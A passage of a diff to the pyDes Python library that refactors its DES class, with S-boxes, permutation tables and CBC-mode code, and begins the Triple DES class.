5, 6, 7, 8, - 7, 8, 9, 10, 11, 12, - 11, 12, 13, 14, 15, 16, - 15, 16, 17, 18, 19, 20, - 19, 20, 21, 22, 23, 24, - 23, 24, 25, 26, 27, 28, - 27, 28, 29, 30, 31, 0 - ] - - # The (in)famous S-boxes - __sbox = [ - # S1 - [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7, - 0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8, - 4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0, - 15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13], - - # S2 - [15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10, - 3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5, - 0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15, - 13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9], - - # S3 - [10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8, - 13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1, - 13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7, - 1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12], - - # S4 - [7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15, - 13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9, - 10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4, - 3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14], - - # S5 - [2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9, - 14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6, - 4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14, - 11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3], - - # S6 - [12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11, - 10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8, - 9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6, - 4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13], - - # S7 - [4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1, - 13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6, - 1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2, - 6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12], - - # S8 - [13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7, - 1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2, - 7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8, - 2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11], - ] - - - # 32-bit permutation function P used on the output of the S-boxes - __p = [ - 15, 6, 19, 20, 28, 11, - 27, 16, 0, 14, 22, 25, - 4, 17, 30, 9, 1, 7, - 23,13, 31, 26, 2, 8, - 18, 12, 29, 5, 21, 10, - 3, 24 - ] - - # final permutation IP^-1 - __fp = [ - 39, 7, 47, 15, 55, 23, 63, 31, - 38, 6, 46, 14, 54, 22, 62, 30, - 37, 5, 45, 13, 53, 21, 61, 29, - 36, 4, 44, 12, 52, 20, 60, 28, - 35, 3, 43, 11, 51, 19, 59, 27, - 34, 2, 42, 10, 50, 18, 58, 26, - 33, 1, 41, 9, 49, 17, 57, 25, - 32, 0, 40, 8, 48, 16, 56, 24 - ] - - # Type of crypting being done - ENCRYPT = 0x00 - DECRYPT = 0x01 - - # Initialisation - def __init__(self, key, mode=ECB, IV=None, pad=None, padmode=PAD_NORMAL): - # Sanity checking of arguments. - if len(key) != 8: - raise ValueError("Invalid DES key size. Key must be exactly 8 bytes long.") - _baseDes.__init__(self, mode, IV, pad, padmode) - self.key_size = 8 - - self.L = [] - self.R = [] - self.Kn = [ [0] * 48 ] * 16 # 16 48-bit keys (K1 - K16) - self.final = [] - - self.setKey(key) - - def setKey(self, key): - """Will set the crypting key for this object. Must be 8 bytes.""" - _baseDes.setKey(self, key) - self.__create_sub_keys() - - def __String_to_BitList(self, data): - """Turn the string data, into a list of bits (1, 0)'s""" - if _pythonMajorVersion < 3: - # Turn the strings into integers. Python 3 uses a bytes - # class, which already has this behaviour. - data = [ord(c) for c in data] - - result = [False] * len(data) * 8 - pos = 0 - for ch in data: - result[pos + 0] = (ch & (1 << 7) != 0) - result[pos + 1] = (ch & (1 << 6) != 0) - result[pos + 2] = (ch & (1 << 5) != 0) - result[pos + 3] = (ch & (1 << 4) != 0) - result[pos + 4] = (ch & (1 << 3) != 0) - result[pos + 5] = (ch & (1 << 2) != 0) - result[pos + 6] = (ch & (1 << 1) != 0) - result[pos + 7] = (ch & (1 << 0) != 0) - pos += 8 - - return result - - def __BitList_to_String(self, data): - """Turn the list of bits -> data, into a string""" - result = [0] * (len(data) >> 3) - pos = 0 - while pos < len(data): - c = data[pos + 0] << (7 - 0) - c += data[pos + 1] << (7 - 1) - c += data[pos + 2] << (7 - 2) - c += data[pos + 3] << (7 - 3) - c += data[pos + 4] << (7 - 4) - c += data[pos + 5] << (7 - 5) - c += data[pos + 6] << (7 - 6) - c += data[pos + 7] << (7 - 7) - result[pos >> 3] = c - pos += 8 - - if _pythonMajorVersion < 3: - return ''.join([ chr(c) for c in result ]) - else: - return bytes(result) - - def __permutate(self, table, block): - """Permutate this block with the specified table""" - #return map(lambda x: block[x], table) - return list(block[x] for x in table) - - # Transform the secret key, so that it is ready for data processing - # Create the 16 subkeys, K[1] - K[16] - def __create_sub_keys(self): - """Create the 16 subkeys K[1] to K[16] from the given key""" - key = self.__permutate(des.__pc1, self.__String_to_BitList(self.getKey())) - i = 0 - # Split into Left and Right sections - self.L = key[:28] - self.R = key[28:] - while i < 16: - j = 0 - # Perform circular left shifts - while j < des.__left_rotations[i]: - self.L.append(self.L[0]) - del self.L[0] - - self.R.append(self.R[0]) - del self.R[0] - - j += 1 - - # Create one of the 16 subkeys through pc2 permutation - self.Kn[i] = self.__permutate(des.__pc2, self.L + self.R) - - i += 1 - - # Main part of the encryption algorithm, the number cruncher :) - def __des_crypt(self, block, crypt_type): - """Crypt the block of data through DES bit-manipulation""" - block = self.__permutate(des.__ip, block) - Bn = [0] * 32 - self.L = block[:32] - self.R = block[32:] - - # Encryption starts from Kn[1] through to Kn[16] - if crypt_type == des.ENCRYPT: - iteration = 0 - iteration_adjustment = 1 - # Decryption starts from Kn[16] down to Kn[1] - else: - iteration = 15 - iteration_adjustment = -1 - - i = 0 - while i < 16: - # Make a copy of R[i-1], this will later become L[i] - tempR = self.R[:] - - # Permutate R[i - 1] to start creating R[i] - self.R = self.__permutate(des.__expansion_table, self.R) - - # Exclusive or R[i - 1] with K[i], create B[1] to B[8] whilst here - self.R = map(lambda x, y: x ^ y, self.R, self.Kn[iteration]) - B = [self.R[:6], self.R[6:12], self.R[12:18], self.R[18:24], self.R[24:30], self.R[30:36], self.R[36:42], self.R[42:]] - # Optimization: Replaced below commented code with above - #j = 0 - #B = [] - #while j < len(self.R): - # self.R[j] = self.R[j] ^ self.Kn[iteration][j] - # j += 1 - # if j % 6 == 0: - # B.append(self.R[j-6:j]) - - # Permutate B[1] to B[8] using the S-Boxes - j = 0 - pos = 0 - while j < 8: - # Work out the offsets - m = (B[j][0] << 1) + B[j][5] - n = (B[j][1] << 3) + (B[j][2] << 2) + (B[j][3] << 1) + B[j][4] - - # Find the permutation value - v = des.__sbox[j][(m << 4) + n] - - # Turn value into bits, add it to result: Bn - Bn[pos] = (v & 8) >> 3 - Bn[pos + 1] = (v & 4) >> 2 - Bn[pos + 2] = (v & 2) >> 1 - Bn[pos + 3] = v & 1 - - pos += 4 - j += 1 - - # Permutate the concatination of B[1] to B[8] (Bn) - self.R = self.__permutate(des.__p, Bn) - - # Xor with L[i - 1] - self.R = map(lambda x, y: x ^ y, self.R, self.L) - # Optimization: This now replaces the below commented code - #j = 0 - #while j < len(self.R): - # self.R[j] = self.R[j] ^ self.L[j] - # j += 1 - - # L[i] becomes R[i - 1] - self.L = tempR - - i += 1 - iteration += iteration_adjustment - - # Final permutation of R[16]L[16] - self.final = self.__permutate(des.__fp, self.R + self.L) - return self.final - - - # Data to be encrypted/decrypted - def crypt(self, data, crypt_type): - """Crypt the data in blocks, running it through des_crypt()""" - - # Error check the data - if not data: - return '' - if len(data) % self.block_size != 0: - if crypt_type == des.DECRYPT: # Decryption must work on 8 byte blocks - raise ValueError("Invalid data length, data must be a multiple of " + str(self.block_size) + " bytes\n.") - if not self.getPadding(): - raise ValueError("Invalid data length, data must be a multiple of " + str(self.block_size) + " bytes\n. Try setting the optional padding character") - else: - data += (self.block_size - (len(data) % self.block_size)) * self.getPadding() - # print "Len of data: %f" % (len(data) / self.block_size) - - if self.getMode() == CBC: - if self.getIV(): - iv = self.__String_to_BitList(self.getIV()) - else: - raise ValueError("For CBC mode, you must supply the Initial Value (IV) for ciphering") - - # Split the data into blocks, crypting each one seperately - i = 0 - dict = {} - result = [] - #cached = 0 - #lines = 0 - while i < len(data): - # Test code for caching encryption results - #lines += 1 - #if dict.has_key(data[i:i+8]): - #print "Cached result for: %s" % data[i:i+8] - # cached += 1 - # result.append(dict[data[i:i+8]]) - # i += 8 - # continue - - block = self.__String_to_BitList(data[i:i+8]) - - # Xor with IV if using CBC mode - if self.getMode() == CBC: - if crypt_type == des.ENCRYPT: - block = map(lambda x, y: x ^ y, block, iv) - #j = 0 - #while j < len(block): - # block[j] = block[j] ^ iv[j] - # j += 1 - - processed_block = self.__des_crypt(block, crypt_type) - - if crypt_type == des.DECRYPT: - processed_block = map(lambda x, y: x ^ y, processed_block, iv) - #j = 0 - #while j < len(processed_block): - # processed_block[j] = processed_block[j] ^ iv[j] - # j += 1 - iv = block - else: - iv = processed_block - else: - processed_block = self.__des_crypt(block, crypt_type) - - - # Add the resulting crypted block to our list - #d = self.__BitList_to_String(processed_block) - #result.append(d) - result.append(self.__BitList_to_String(processed_block)) - #dict[data[i:i+8]] = d - i += 8 - - # print "Lines: %d, cached: %d" % (lines, cached) - - # Return the full crypted string - if _pythonMajorVersion < 3: - return ''.join(result) - else: - return bytes.fromhex('').join(result) - - def encrypt(self, data, pad=None, padmode=None): - """encrypt(data, [pad], [padmode]) -> bytes - - data : Bytes to be encrypted - pad : Optional argument for encryption padding. Must only be one byte - padmode : Optional argument for overriding the padding mode. - - The data must be a multiple of 8 bytes and will be encrypted - with the already specified key. Data does not have to be a - multiple of 8 bytes if the padding character is supplied, or - the padmode is set to PAD_PKCS5, as bytes will then added to - ensure the be padded data is a multiple of 8 bytes. - """ - data = self._guardAgainstUnicode(data) - if pad is not None: - pad = self._guardAgainstUnicode(pad) - data = self._padData(data, pad, padmode) - return self.crypt(data, des.ENCRYPT) - - def decrypt(self, data, pad=None, padmode=None): - """decrypt(data, [pad], [padmode]) -> bytes - - data : Bytes to be encrypted - pad : Optional argument for decryption padding. Must only be one byte - padmode : Optional argument for overriding the padding mode. - - The data must be a multiple of 8 bytes and will be decrypted - with the already specified key. In PAD_NORMAL mode, if the - optional padding character is supplied, then the un-encrypted - data will have the padding characters removed from the end of - the bytes. This pad removal only occurs on the last 8 bytes of - the data (last data block). In PAD_PKCS5 mode, the special - padding end markers will be removed from the data after decrypting. - """ - data = self._guardAgainstUnicode(data) - if pad is not None: - pad = self._guardAgainstUnicode(pad) - data = self.crypt(data, des.DECRYPT) - return self._unpadData(data, pad, padmode) + """DES encryption/decrytpion class + + Supports ECB (Electronic Code Book) and CBC (Cypher Block Chaining) modes. + + pyDes.des(key,[mode], [IV]) + + key -> Bytes containing the encryption key, must be exactly 8 bytes + mode -> Optional argument for encryption type, can be either pyDes.ECB + (Electronic Code Book), pyDes.CBC (Cypher Block Chaining) + IV -> Optional Initial Value bytes, must be supplied if using CBC mode. + Must be 8 bytes in length. + pad -> Optional argument, set the pad character (PAD_NORMAL) to use + during all encrypt/decrpt operations done with this instance. + padmode -> Optional argument, set the padding mode (PAD_NORMAL or + PAD_PKCS5) to use during all encrypt/decrpt operations done + with this instance. + """ + + + # Permutation and translation tables for DES + __pc1 = [56, 48, 40, 32, 24, 16, 8, + 0, 57, 49, 41, 33, 25, 17, + 9, 1, 58, 50, 42, 34, 26, + 18, 10, 2, 59, 51, 43, 35, + 62, 54, 46, 38, 30, 22, 14, + 6, 61, 53, 45, 37, 29, 21, + 13, 5, 60, 52, 44, 36, 28, + 20, 12, 4, 27, 19, 11, 3 + ] + + # number left rotations of pc1 + __left_rotations = [ + 1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1 + ] + + # permuted choice key (table 2) + __pc2 = [ + 13, 16, 10, 23, 0, 4, + 2, 27, 14, 5, 20, 9, + 22, 18, 11, 3, 25, 7, + 15, 6, 26, 19, 12, 1, + 40, 51, 30, 36, 46, 54, + 29, 39, 50, 44, 32, 47, + 43, 48, 38, 55, 33, 52, + 45, 41, 49, 35, 28, 31 + ] + + # initial permutation IP + __ip = [57, 49, 41, 33, 25, 17, 9, 1, + 59, 51, 43, 35, 27, 19, 11, 3, + 61, 53, 45, 37, 29, 21, 13, 5, + 63, 55, 47, 39, 31, 23, 15, 7, + 56, 48, 40, 32, 24, 16, 8, 0, + 58, 50, 42, 34, 26, 18, 10, 2, + 60, 52, 44, 36, 28, 20, 12, 4, + 62, 54, 46, 38, 30, 22, 14, 6 + ] + + # Expansion table for turning 32 bit blocks into 48 bits + __expansion_table = [ + 31, 0, 1, 2, 3, 4, + 3, 4, 5, 6, 7, 8, + 7, 8, 9, 10, 11, 12, + 11, 12, 13, 14, 15, 16, + 15, 16, 17, 18, 19, 20, + 19, 20, 21, 22, 23, 24, + 23, 24, 25, 26, 27, 28, + 27, 28, 29, 30, 31, 0 + ] + + # The (in)famous S-boxes + __sbox = [ + # S1 + [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7, + 0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8, + 4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0, + 15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13], + + # S2 + [15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10, + 3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5, + 0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15, + 13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9], + + # S3 + [10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8, + 13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1, + 13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7, + 1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12], + + # S4 + [7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15, + 13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9, + 10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4, + 3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14], + + # S5 + [2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9, + 14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6, + 4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14, + 11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3], + + # S6 + [12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11, + 10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8, + 9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6, + 4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13], + + # S7 + [4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1, + 13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6, + 1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2, + 6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12], + + # S8 + [13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7, + 1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2, + 7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8, + 2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11], + ] + + + # 32-bit permutation function P used on the output of the S-boxes + __p = [ + 15, 6, 19, 20, 28, 11, + 27, 16, 0, 14, 22, 25, + 4, 17, 30, 9, 1, 7, + 23,13, 31, 26, 2, 8, + 18, 12, 29, 5, 21, 10, + 3, 24 + ] + + # final permutation IP^-1 + __fp = [ + 39, 7, 47, 15, 55, 23, 63, 31, + 38, 6, 46, 14, 54, 22, 62, 30, + 37, 5, 45, 13, 53, 21, 61, 29, + 36, 4, 44, 12, 52, 20, 60, 28, + 35, 3, 43, 11, 51, 19, 59, 27, + 34, 2, 42, 10, 50, 18, 58, 26, + 33, 1, 41, 9, 49, 17, 57, 25, + 32, 0, 40, 8, 48, 16, 56, 24 + ] + + # Type of crypting being done + ENCRYPT = 0x00 + DECRYPT = 0x01 + + # Initialisation + def __init__(self, key, mode=ECB, IV=None, pad=None, padmode=PAD_NORMAL): + # Sanity checking of arguments. + if len(key) != 8: + raise ValueError("Invalid DES key size. Key must be exactly 8 bytes long.") + _baseDes.__init__(self, mode, IV, pad, padmode) + self.key_size = 8 + + self.L = [] + self.R = [] + self.Kn = [ [0] * 48 ] * 16 # 16 48-bit keys (K1 - K16) + self.final = [] + + self.setKey(key) + + def setKey(self, key): + """Will set the crypting key for this object. Must be 8 bytes.""" + _baseDes.setKey(self, key) + self.__create_sub_keys() + + def __String_to_BitList(self, data): + """Turn the string data, into a list of bits (1, 0)'s""" + if _pythonMajorVersion < 3: + # Turn the strings into integers. Python 3 uses a bytes + # class, which already has this behaviour. + data = [ord(c) for c in data] + l = len(data) * 8 + result = [0] * l + pos = 0 + for ch in data: + i = 7 + while i >= 0: + if ch & (1 << i) != 0: + result[pos] = 1 + else: + result[pos] = 0 + pos += 1 + i -= 1 + + return result + + def __BitList_to_String(self, data): + """Turn the list of bits -> data, into a string""" + result = [] + pos = 0 + c = 0 + while pos < len(data): + c += data[pos] << (7 - (pos % 8)) + if (pos % 8) == 7: + result.append(c) + c = 0 + pos += 1 + + if _pythonMajorVersion < 3: + return ''.join([ chr(c) for c in result ]) + else: + return bytes(result) + + def __permutate(self, table, block): + """Permutate this block with the specified table""" + return [block[i] for i in table] + + # Transform the secret key, so that it is ready for data processing + # Create the 16 subkeys, K[1] - K[16] + def __create_sub_keys(self): + """Create the 16 subkeys K[1] to K[16] from the given key""" + key = self.__permutate(des.__pc1, self.__String_to_BitList(self.getKey())) + i = 0 + # Split into Left and Right sections + self.L = key[:28] + self.R = key[28:] + while i < 16: + j = 0 + # Perform circular left shifts + while j < des.__left_rotations[i]: + self.L.append(self.L[0]) + del self.L[0] + + self.R.append(self.R[0]) + del self.R[0] + + j += 1 + + # Create one of the 16 subkeys through pc2 permutation + self.Kn[i] = self.__permutate(des.__pc2, self.L + self.R) + + i += 1 + + # Main part of the encryption algorithm, the number cruncher :) + def __des_crypt(self, block, crypt_type): + """Crypt the block of data through DES bit-manipulation""" + block = self.__permutate(des.__ip, block) + self.L = block[:32] + self.R = block[32:] + + # Encryption starts from Kn[1] through to Kn[16] + if crypt_type == des.ENCRYPT: + iteration = 0 + iteration_adjustment = 1 + # Decryption starts from Kn[16] down to Kn[1] + else: + iteration = 15 + iteration_adjustment = -1 + + i = 0 + while i < 16: + # Make a copy of R[i-1], this will later become L[i] + tempR = self.R[:] + + # Permutate R[i - 1] to start creating R[i] + self.R = self.__permutate(des.__expansion_table, self.R) + + # Exclusive or R[i - 1] with K[i], create B[1] to B[8] whilst here + self.R = [b ^ k for b, k in zip(self.R, self.Kn[iteration])] + B = [self.R[:6], self.R[6:12], self.R[12:18], self.R[18:24], self.R[24:30], self.R[30:36], self.R[36:42], self.R[42:]] + # Optimization: Replaced below commented code with above + #j = 0 + #B = [] + #while j < len(self.R): + # self.R[j] = self.R[j] ^ self.Kn[iteration][j] + # j += 1 + # if j % 6 == 0: + # B.append(self.R[j-6:j]) + + # Permutate B[1] to B[8] using the S-Boxes + j = 0 + Bn = [0] * 32 + pos = 0 + while j < 8: + # Work out the offsets + m = (B[j][0] << 1) + B[j][5] + n = (B[j][1] << 3) + (B[j][2] << 2) + (B[j][3] << 1) + B[j][4] + + # Find the permutation value + v = des.__sbox[j][(m << 4) + n] + + # Turn value into bits, add it to result: Bn + Bn[pos] = (v & 8) >> 3 + Bn[pos + 1] = (v & 4) >> 2 + Bn[pos + 2] = (v & 2) >> 1 + Bn[pos + 3] = v & 1 + + pos += 4 + j += 1 + + # Permutate the concatination of B[1] to B[8] (Bn) + self.R = self.__permutate(des.__p, Bn) + + # Xor with L[i - 1] + self.R = [b ^ l for b, l in zip(self.R, self.L)] + # Optimization: This now replaces the below commented code + #j = 0 + #while j < len(self.R): + # self.R[j] = self.R[j] ^ self.L[j] + # j += 1 + + # L[i] becomes R[i - 1] + self.L = tempR + + i += 1 + iteration += iteration_adjustment + + # Final permutation of R[16]L[16] + self.final = self.__permutate(des.__fp, self.R + self.L) + return self.final + + + # Data to be encrypted/decrypted + def crypt(self, data, crypt_type): + """Crypt the data in blocks, running it through des_crypt()""" + + # Error check the data + if not data: + return '' + if len(data) % self.block_size != 0: + if crypt_type == des.DECRYPT: # Decryption must work on 8 byte blocks + raise ValueError("Invalid data length, data must be a multiple of " + str(self.block_size) + " bytes\n.") + if not self.getPadding(): + raise ValueError("Invalid data length, data must be a multiple of " + str(self.block_size) + " bytes\n. Try setting the optional padding character") + else: + data += (self.block_size - (len(data) % self.block_size)) * self.getPadding() + # print "Len of data: %f" % (len(data) / self.block_size) + + if self.getMode() == CBC: + if self.getIV(): + iv = self.__String_to_BitList(self.getIV()) + else: + raise ValueError("For CBC mode, you must supply the Initial Value (IV) for ciphering") + + # Split the data into blocks, crypting each one seperately + i = 0 + dict = {} + result = [] + #cached = 0 + #lines = 0 + while i < len(data): + # Test code for caching encryption results + #lines += 1 + #if dict.has_key(data[i:i+8]): + #print "Cached result for: %s" % data[i:i+8] + # cached += 1 + # result.append(dict[data[i:i+8]]) + # i += 8 + # continue + + block = self.__String_to_BitList(data[i:i+8]) + + # Xor with IV if using CBC mode + if self.getMode() == CBC: + if crypt_type == des.ENCRYPT: + block = [b ^ v for b, v in zip(block, iv)] + #j = 0 + #while j < len(block): + # block[j] = block[j] ^ iv[j] + # j += 1 + + processed_block = self.__des_crypt(block, crypt_type) + + if crypt_type == des.DECRYPT: + processed_block = [b ^ v for b, v in zip(processed_block, iv)] + #j = 0 + #while j < len(processed_block): + # processed_block[j] = processed_block[j] ^ iv[j] + # j += 1 + iv = block + else: + iv = processed_block + else: + processed_block = self.__des_crypt(block, crypt_type) + + + # Add the resulting crypted block to our list + #d = self.__BitList_to_String(processed_block) + #result.append(d) + result.append(self.__BitList_to_String(processed_block)) + #dict[data[i:i+8]] = d + i += 8 + + # print "Lines: %d, cached: %d" % (lines, cached) + + # Return the full crypted string + if _pythonMajorVersion < 3: + return ''.join(result) + else: + return bytes.fromhex('').join(result) + + def encrypt(self, data, pad=None, padmode=None): + """encrypt(data, [pad], [padmode]) -> bytes + + data : Bytes to be encrypted + pad : Optional argument for encryption padding. Must only be one byte + padmode : Optional argument for overriding the padding mode. + + The data must be a multiple of 8 bytes and will be encrypted + with the already specified key. Data does not have to be a + multiple of 8 bytes if the padding character is supplied, or + the padmode is set to PAD_PKCS5, as bytes will then added to + ensure the be padded data is a multiple of 8 bytes. + """ + data = self._guardAgainstUnicode(data) + if pad is not None: + pad = self._guardAgainstUnicode(pad) + data = self._padData(data, pad, padmode) + return self.crypt(data, des.ENCRYPT) + + def decrypt(self, data, pad=None, padmode=None): + """decrypt(data, [pad], [padmode]) -> bytes + + data : Bytes to be encrypted + pad : Optional argument for decryption padding. Must only be one byte + padmode : Optional argument for overriding the padding mode. + + The data must be a multiple of 8 bytes and will be decrypted + with the already specified key. In PAD_NORMAL mode, if the + optional padding character is supplied, then the un-encrypted + data will have the padding characters removed from the end of + the bytes. This pad removal only occurs on the last 8 bytes of + the data (last data block). In PAD_PKCS5 mode, the special + padding end markers will be removed from the data after decrypting. + """ + data = self._guardAgainstUnicode(data) + if pad is not None: + pad = self._guardAgainstUnicode(pad) + data = self.crypt(data, des.DECRYPT) + return self._unpadData(data, pad, padmode) ############################################################################# -# Triple DES # +# Triple DES # ############################################################################# class triple_des(_baseDes): - """Triple DES encryption/decrytpion class - - This algorithm uses the DES-EDE3 (when a 24 byte key is supplied) or - the DES-EDE2 (when a 16 byte key is supplied) encryption methods. - Supports ECB (Electronic Code Book) and CBC (Cypher Block Chaining) modes. - - pyDes.des(key, [mode], [IV]) - - key -> Bytes containing the encryption key, must be either 16 or - 24 bytes long - mode -> Optional argument for encryption type, can be either pyDes.ECB - (Electronic Code Book), pyDes.CBC (Cypher Block Chaining) - IV -> Optional Initial Value bytes, must be supplied if using CBC mode. - Must be 8 bytes in length. - pad -> Optional argument, set the pad character (PAD_NORMAL) to use - during all encrypt/decrpt operations done with this instance. - padmode -> Optional argument, set the padding mode (PAD_NORMAL or - PAD_PKCS5) to use during all encrypt/decrpt operations done - with this instance. - """ - def __init__(self, key, mode=ECB, IV=None, pad=None, padmode=PAD_NORMAL): - _baseDes.__init__(self, mode, IV, pad, padmode) - self.setKey(key) - - def setKey(self, key): - """Will set the crypting key for this object. Either 16 or 24 bytes long.""" - self.key_size = 24 # Use DES-EDE3 mode - if len(key) != self.key_size: - if len(key) == 16: # Use DES-EDE2 mode - self.key_size = 16 - else: - raise ValueError("Invalid triple DES key size. Key must be either 16 or 24 bytes long") - if self.getMode() == CBC: - if not self.getIV(): - # Use the first 8 bytes of the key - self._iv = key[:self.block_size] - if len(self.getIV()) != self.block_size: - raise ValueError("Invalid IV, must be 8 bytes in length") - self.__key1 = des(key[:8], self._mode, self._iv, - self._padding, self._padmode) - self.__key2 = des(key[8:16], self._mode, self._iv, - self._padding, self._padmode) - if self.key_size == 16: - self.__key3 = self.__key1 - else: - self.__key3 = des(key[16:], self._mode, self._iv, - self._padding, self._padmode) - _baseDes.setKey(self, key) - - # Override setter methods to work on all 3 keys. - - def setMode(self, mode): - """Sets the type of crypting mode, pyDes.ECB or pyDes.CBC""" - _baseDes.setMode(self, mode) - for key in (self.__key1, self.__key2, self.__key3): - key.setMode(mode) - - def setPadding(self, pad): - """setPadding() -> bytes of length 1. Padding character.""" - _baseDes.setPadding(self, pad) - for key in (self.__key1, self.__key2, self.__key3): - key.setPadding(pad) - - def setPadMode(self, mode): - """Sets the type of padding mode, pyDes.PAD_NORMAL or pyDes.PAD_PKCS5""" - _baseDes.setPadMode(self, mode) - for key in (self.__key1, self.__key2, self.__key3): - key.setPadMode(mode) - - def setIV(self, IV): - """Will set the Initial Value, used in conjunction with CBC mode""" - _baseDes.setIV(self, IV) - for key in (self.__key1, self.__key2, self.__key3): - key.setIV(IV) - - def encrypt(self, data, pad=None, padmode=None): - """encrypt(data, [pad], [padmode]) -> bytes - - data : bytes to be encrypted - pad : Optional argument for encryption padding. Must only be one byte - padmode : Optional argument for overriding the padding mode. - - The data must be a multiple of 8 bytes and will be encrypted - with the already specified key. Data does not have to be a - multiple of 8 bytes if the padding character is supplied, or - the padmode is set to PAD_PKCS5, as bytes will then added to - ensure the be padded data is a multiple of 8 bytes. - """ - ENCRYPT = des.ENCRYPT - DECRYPT = des.DECRYPT - data = self._guardAgainstUnicode(data) - if pad is not None: - pad = self._guardAgainstUnicode(pad) - # Pad the data accordingly. - data = self._padData(data, pad, padmode) - if self.getMode() == CBC: - self.__key1.setIV(self.getIV()) - self.__key2.setIV(self.getIV()) - self.__key3.setIV(self.getIV()) - i = 0 - result = [] - while i < len(data): - block = self.__key1.crypt(data[i:i+8], ENCRYPT) - block = self.__key2.crypt(block, DECRYPT) - block = self.__key3.crypt(block, ENCRYPT) - self.__key1.setIV(block) - self.__key2.setIV(block) - self.__key3.setIV(block) - result.append(block) - i += 8 - if _pythonMajorVersion < 3: - return ''.join(result) - else: - return bytes.fromhex('').join(result) - else: - data = self.__key1.crypt(data, ENCRYPT) - 